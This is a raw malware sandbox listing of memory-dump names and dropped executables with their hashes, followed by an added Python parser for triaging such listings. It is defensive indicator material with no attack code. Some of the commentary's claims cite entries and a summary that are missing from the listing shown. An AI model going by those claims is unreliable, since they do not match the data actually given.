memory/4736-257-0x0000000005600000-0x0000000005601000-memory.dmp

memory/2800-260-0x0000000000400000-0x0000000000440000-memory.dmp

memory/2800-256-0x00000000001F0000-0x00000000001F9000-memory.dmp

memory/2740-254-0x0000000007310000-0x0000000007311000-memory.dmp

memory/1376-252-0x0000000004E80000-0x0000000004E81000-memory.dmp

memory/2740-246-0x0000000006A10000-0x0000000006A11000-memory.dmp

memory/1376-215-0x00000000006A0000-0x00000000006A1000-memory.dmp

memory/2764-214-0x0000000000400000-0x0000000000414000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-1GIM0.tmp\Mon13d453d994180b.tmp

MD5 ed5b2c2bf689ca52e9b53f6bc2195c63
SHA1 f61d31d176ba67cfff4f0cab04b4b2d19df91684
SHA256 4feb70ee4d54dd933dfa3a8d0461dc428484489e8a34b905276a799e0bf9220f
SHA512 b8c6e7b16fd13ca570cabd6ea29f33ba90e7318f7076862257f18f6a22695d92d608ca5e5c3d99034757b4e5b7167d4586b922eebf0e090f78df67651bde5179

memory/2340-209-0x0000000000000000-mapping.dmp

memory/2740-206-0x0000000003EF0000-0x0000000003EF1000-memory.dmp

memory/5056-205-0x0000000000000000-mapping.dmp

memory/4696-204-0x00000000032C0000-0x00000000032C1000-memory.dmp

memory/4996-203-0x0000000000000000-mapping.dmp

memory/2740-202-0x0000000003EF0000-0x0000000003EF1000-memory.dmp

memory/4696-200-0x00000000032C0000-0x00000000032C1000-memory.dmp

memory/4260-199-0x0000000000000000-mapping.dmp

memory/3952-192-0x0000000000000000-mapping.dmp

memory/1280-174-0x0000000000000000-mapping.dmp

memory/1816-176-0x0000000000000000-mapping.dmp

memory/1464-169-0x0000000000000000-mapping.dmp

memory/1496-168-0x0000000000000000-mapping.dmp

memory/1640-172-0x0000000000000000-mapping.dmp

memory/1180-171-0x0000000000000000-mapping.dmp

memory/1376-170-0x0000000000000000-mapping.dmp

memory/1264-166-0x0000000000000000-mapping.dmp

memory/2680-268-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe

MD5 54c8b761f8a0670409d5651f75297d96
SHA1 da8a479f181f644eb10fedea2b1d5637da8a43c2
SHA256 bb4ad9554e4dd6ec5b9b938b25594ba35495302d0a4974fecce6e34bb36ee0d6
SHA512 2b942ece79b0f45421014937c92599f0f56a6382ef6cf4d2f26df4da8599cac99be36317a87e7a0b8056108dbdba198e79a058180c2bee19c4b3446ea8071d86

memory/2680-271-0x0000000000400000-0x0000000000401000-memory.dmp

memory/2276-273-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\is-LQGDR.tmp\Mon13073304e5395.tmp

MD5 9303156631ee2436db23827e27337be4
SHA1 018e0d5b6ccf7000e36af30cebeb8adc5667e5fa
SHA256 bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4
SHA512 9fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f

memory/1920-276-0x0000000000400000-0x0000000000414000-memory.dmp

memory/2824-277-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exe

MD5 de86aa83e2e8a406f396412b4fc1a459
SHA1 43b171a9c3c7a3f3d813434b4f74a1d66015244c
SHA256 58c53388484af231197685f7dce6e5bb9b1ca5a209e6f010ea8b14699394ae7f
SHA512 084cefa9847bf2e3c7bffdc7aee4c40291a0e2533972226839783ca93b3e37ddf8952a1653d2deb42cecfaa0872c756c47e14cf3eb12dacd4adc4bfbce3ce759

memory/2144-283-0x0000000000418EFA-mapping.dmp

memory/4000-285-0x0000000000000000-mapping.dmp

memory/2144-291-0x0000000005650000-0x0000000005651000-memory.dmp

memory/4636-292-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\Worldoffer.exe

MD5 d154cb3796a5800eae082bc670467c6e
SHA1 a5ac2683f0077ef8c685099c235eef8a665fa22a
SHA256 6dd9f0d5110c7437b151f52376f893b486e8518aacf7821b9fc10b3915b984df
SHA512 dbe780ddd25694706b8aa897625e21638e9ad668ac2663c5d4a2579a2ac0d1c47eecf065e08f3d01966db79faa7961c265281bd2b021803901df83d8b1d60b31

memory/4680-297-0x0000000000000000-mapping.dmp

memory/2144-299-0x0000000005220000-0x0000000005221000-memory.dmp

memory/2144-296-0x00000000050F0000-0x00000000050F1000-memory.dmp

memory/4000-290-0x00000000002F0000-0x00000000002F1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\SoftwareInstaller2191.exe

MD5 87a05df1d53251da9a05be73d636760d
SHA1 a3b9fee427da74725fe0cd6896fcba45745941ec
SHA256 230db1bb45e3d88f8424e4b4b97d074e831a13f6933ed1bb9567e8e701774949
SHA512 23c739d2ea66ad05b004d14424998da892fd773dc9336a373592ab64540b35dff06957dae895aea7b9a7b295b6985580997bd086c99ba173e997857a8afe6237

memory/520-305-0x0000000000000000-mapping.dmp

memory/380-308-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\chrome1.exe

MD5 11033c9d0e64292c41f294485d665d2e
SHA1 0fd7c7bbd85a1c13893acbc6ca743838ffef522f
SHA256 865e7271a4d2856913597c753fa4b8f50f78c2d9e56d732aa6299e949e2e1572
SHA512 df1a3ca90f2625e01307f108fc3bf4ff94a8a610703e2be391221d5556debc89e96f6dbd62a6df7465b7aaeed6558d1831140a677eabd01e7fc123bbc82262f4

memory/2824-309-0x00000000008A0000-0x00000000008A1000-memory.dmp

memory/4680-318-0x0000000000570000-0x00000000006BA000-memory.dmp

memory/2424-319-0x0000000000000000-mapping.dmp

memory/4000-324-0x0000000004C60000-0x0000000004C61000-memory.dmp

memory/2144-327-0x0000000005040000-0x0000000005646000-memory.dmp

memory/380-322-0x0000000001730000-0x0000000001732000-memory.dmp

memory/1732-335-0x0000000000000000-mapping.dmp

memory/728-330-0x0000000000000000-mapping.dmp

memory/4680-315-0x00000000001E0000-0x00000000001F0000-memory.dmp

memory/2424-336-0x000000001BAF0000-0x000000001BAF2000-memory.dmp

memory/700-337-0x0000000000000000-mapping.dmp

memory/2740-306-0x0000000007760000-0x0000000007761000-memory.dmp

memory/4232-338-0x0000000000000000-mapping.dmp

memory/2260-341-0x0000000000000000-mapping.dmp

memory/4636-344-0x0000000002150000-0x00000000021CB000-memory.dmp

memory/5064-342-0x0000000000000000-mapping.dmp

memory/5024-349-0x0000000000000000-mapping.dmp

memory/4636-350-0x0000000000400000-0x00000000004D8000-memory.dmp

memory/4232-352-0x0000000001460000-0x0000000001462000-memory.dmp

memory/1640-351-0x0000000007790000-0x00000000078DC000-memory.dmp

memory/2260-348-0x000000001BCE0000-0x000000001BCE2000-memory.dmp

memory/4636-347-0x00000000021D0000-0x00000000022A5000-memory.dmp

memory/980-346-0x0000000000000000-mapping.dmp

memory/1120-355-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\inst1.exe

MD5 e5f9bcffdde599dd66c729fe2868e411
SHA1 2990ab84be3b99e687ced6c25c9548c3a0757e25
SHA256 c5099f6b446fcc8fd368148b66879910466a02f84d2975467a43a0e4cac11fe8
SHA512 7965c1b0828835adb171ac2a8a5938fd175aefce43353eb29d124e9cb5e324376c3f6e74528c8e066b3ee67f08bff06b5cbd9072772986713360423276e8a8fa

memory/2740-301-0x0000000006B90000-0x0000000006B91000-memory.dmp

memory/4000-300-0x0000000000A20000-0x0000000000A21000-memory.dmp

memory/3056-298-0x00000000008D0000-0x00000000008E6000-memory.dmp

memory/2144-282-0x0000000000400000-0x0000000000420000-memory.dmp

\Users\Admin\AppData\Local\Temp\is-BR1JS.tmp\idp.dll

MD5 b37377d34c8262a90ff95a9a92b65ed8
SHA1 faeef415bd0bc2a08cf9fe1e987007bf28e7218d
SHA256 e5a0ad2e37dde043a0dd4ad7634961ff3f0d70e87d2db49761eb4c1f468bb02f
SHA512 69d8da5b45d9b4b996d32328d3402fa37a3d710564d47c474bf9e15c1e45bc15b2858dbab446e6baec0c099d99007ff1099e9c4e66cfd1597f28c420bb50fdcc

memory/2276-278-0x00000000001E0000-0x00000000001E1000-memory.dmp

memory/4404-358-0x0000000000000000-mapping.dmp

memory/728-359-0x00000000001D0000-0x00000000001F6000-memory.dmp

memory/1376-360-0x0000000000000000-mapping.dmp

memory/728-362-0x0000000000400000-0x000000000045E000-memory.dmp

memory/728-361-0x0000000000530000-0x0000000000573000-memory.dmp

memory/2944-363-0x0000000000000000-mapping.dmp

memory/4604-364-0x0000000000000000-mapping.dmp

memory/4240-366-0x0000000000000000-mapping.dmp

memory/1936-365-0x0000000000000000-mapping.dmp

memory/4292-368-0x0000000000000000-mapping.dmp

memory/4696-388-0x000000007F310000-0x000000007F311000-memory.dmp

memory/2740-390-0x000000007EC70000-0x000000007EC71000-memory.dmp

memory/4604-414-0x0000000004C60000-0x0000000004C61000-memory.dmp

memory/2688-418-0x0000000077250000-0x00000000773DE000-memory.dmp

memory/5196-446-0x00000000055E0000-0x00000000055E1000-memory.dmp

memory/2688-449-0x00000000057C0000-0x00000000057C1000-memory.dmp

memory/3804-451-0x0000000005640000-0x0000000005641000-memory.dmp

memory/4252-461-0x00000000013B0000-0x00000000013B1000-memory.dmp

memory/2740-466-0x00000000065C3000-0x00000000065C4000-memory.dmp

memory/4696-462-0x00000000071B3000-0x00000000071B4000-memory.dmp

memory/5020-495-0x00000000048CB000-0x00000000049CC000-memory.dmp

memory/5868-498-0x0000000000460000-0x000000000050E000-memory.dmp

memory/4748-515-0x00000237FDAC0000-0x00000237FDB32000-memory.dmp

memory/5868-518-0x0000000000400000-0x0000000000455000-memory.dmp

memory/5868-512-0x0000000002070000-0x00000000020A9000-memory.dmp

memory/1344-530-0x0000000000400000-0x0000000000409000-memory.dmp

memory/2844-533-0x0000021F9D370000-0x0000021F9D3E2000-memory.dmp

memory/5596-547-0x0000018F31000000-0x0000018F31072000-memory.dmp

memory/5868-542-0x00000000049C4000-0x00000000049C6000-memory.dmp

memory/5868-538-0x00000000049C2000-0x00000000049C3000-memory.dmp

memory/5020-523-0x0000000002F50000-0x0000000002FAD000-memory.dmp

memory/4748-507-0x00000237FD7F0000-0x00000237FD83D000-memory.dmp

memory/6124-550-0x00000000001E0000-0x00000000001E8000-memory.dmp

memory/6124-554-0x00000000001F0000-0x00000000001F9000-memory.dmp

memory/6124-558-0x0000000000400000-0x0000000000432000-memory.dmp

memory/5868-502-0x00000000049C0000-0x00000000049C1000-memory.dmp

memory/388-562-0x000001C0B73A0000-0x000001C0B7412000-memory.dmp
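The listing above is the raw dropped-file and memory-dump record of the detonation, and it is easier to read once it is parsed than scanned by eye. Two things in it are worth pulling out programmatically: files that share a SHA256 under different names (the listing shows Mon13be6b39578.exe and 2303a34fa8\tkools.exe with the same digest, the Inno Setup idp.dll and Mon13073304e5395.tmp each re-extracted under a second is-*.tmp directory, and the same DLLs recorded both with and without the C: prefix), and the mapping.dmp entries whose address is not zero (0x4161D7 for PID 4756, 0x418EFA for PID 2144). The parser below is an added example written for this page, not part of the sandbox report or its tooling. It assumes the layout seen above (a path line followed by MD5/SHA1/SHA256/SHA512 lines, and dump names of the form memory/<pid>-<seq>-0x<start>-0x<end>-memory.dmp or memory/<pid>-<seq>-0x<addr>-mapping.dmp); its sample input is a constructed excerpt of the listing, trimmed to MD5 and SHA256 and with one entry repeated on purpose. Reading the non-zero mapping addresses alongside the "Suspicious use of SetThreadContext" signature in the summary is the editor's suggestion of where to look first, not something the report states.

```python
import re
from collections import defaultdict

# Constructed sample: entries from the listing above (MD5/SHA256 only), libcurl.dll repeated once.
LISTING = r"""
C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13be6b39578.exe
MD5 de86aa83e2e8a406f396412b4fc1a459
SHA256 58c53388484af231197685f7dce6e5bb9b1ca5a209e6f010ea8b14699394ae7f

memory/4756-223-0x0000000000400000-0x0000000000450000-memory.dmp
memory/4756-226-0x00000000004161D7-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exe
MD5 de86aa83e2e8a406f396412b4fc1a459
SHA256 58c53388484af231197685f7dce6e5bb9b1ca5a209e6f010ea8b14699394ae7f

memory/4756-230-0x0000000000400000-0x0000000000450000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\libcurl.dll
MD5 d09be1f47fd6b827c81a4812b4f7296f
SHA256 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e

\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\libcurl.dll
MD5 d09be1f47fd6b827c81a4812b4f7296f
SHA256 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e

\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\libcurl.dll
MD5 d09be1f47fd6b827c81a4812b4f7296f
SHA256 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e

memory/4092-132-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/4584-143-0x0000000000000000-mapping.dmp
"""

PATH_RE = re.compile(r"^(?:[A-Za-z]:)?\\Users\\.+$")
HASH_RE = re.compile(r"^(MD5|SHA1|SHA256|SHA512) ([0-9a-fA-F]+)$")
MEM_RE = re.compile(r"^memory/(\d+)-(\d+)-0x([0-9A-Fa-f]+)"
                    r"(?:-0x([0-9A-Fa-f]+))?-(memory|mapping)\.dmp$")

def parse_listing(text):
    """Split the flat listing into file records and memory-dump records."""
    files, regions, current = [], [], None
    for line in (raw.strip() for raw in text.splitlines()):
        if not line:
            continue                         # blank separators carry nothing
        m = MEM_RE.match(line)
        if m:
            pid, seq, start, end, kind = m.groups()
            regions.append({"pid": int(pid), "seq": int(seq), "kind": kind,
                            "start": int(start, 16),
                            "end": int(end, 16) if end else None})
            current = None
        elif PATH_RE.match(line):
            current = {"path": line}         # hash lines that follow belong to it
            files.append(current)
        elif HASH_RE.match(line) and current is not None:
            algo, digest = HASH_RE.match(line).groups()
            current[algo.lower()] = digest.lower()
        else:
            current = None                   # anything else ends the entry
    return files, regions

def normalize(path):
    """Strip the drive letter and case so both spellings of a path compare equal."""
    return re.sub(r"^[A-Za-z]:", "", path).lower()

def dedupe(files):
    """Keep the first record for each (normalized path, sha256) pair."""
    seen, unique = set(), []
    for f in files:
        key = (normalize(f["path"]), f.get("sha256"))
        if key not in seen:
            seen.add(key)
            unique.append(f)
    return unique

def same_content_different_paths(files):
    """sha256 -> sorted paths, for digests that appear under more than one name."""
    by_hash = defaultdict(set)
    for f in files:
        if "sha256" in f:
            by_hash[f["sha256"]].add(normalize(f["path"]))
    return {h: sorted(p) for h, p in by_hash.items() if len(p) > 1}

def nonzero_mapping_addresses(regions):
    """(pid, address) for mapping.dmp entries whose address is not zero (heuristic)."""
    return sorted((r["pid"], r["start"]) for r in regions
                  if r["kind"] == "mapping" and r["start"] != 0)

def dumped_bytes_by_pid(regions):
    """Total size of the memory.dmp regions recorded for each PID."""
    total = defaultdict(int)
    for r in regions:
        if r["kind"] == "memory":
            total[r["pid"]] += r["end"] - r["start"]
    return dict(total)

if __name__ == "__main__":
    files, regions = parse_listing(LISTING)
    print(len(files), "entries,", len(dedupe(files)), "unique")
    print(same_content_different_paths(files))
    print(nonzero_mapping_addresses(regions), dumped_bytes_by_pid(regions))
```

Run against the full listing, same_content_different_paths() is the quick way to see which dropped binaries are copies of each other (a stager persisting itself under a new name shows up as one digest with two paths), and dumped_bytes_by_pid() gives a rough sense of which PIDs the sandbox spent its dump budget on. Both functions work on the normalized path, so the C: and drive-less spellings of the same file are not reported as a pair.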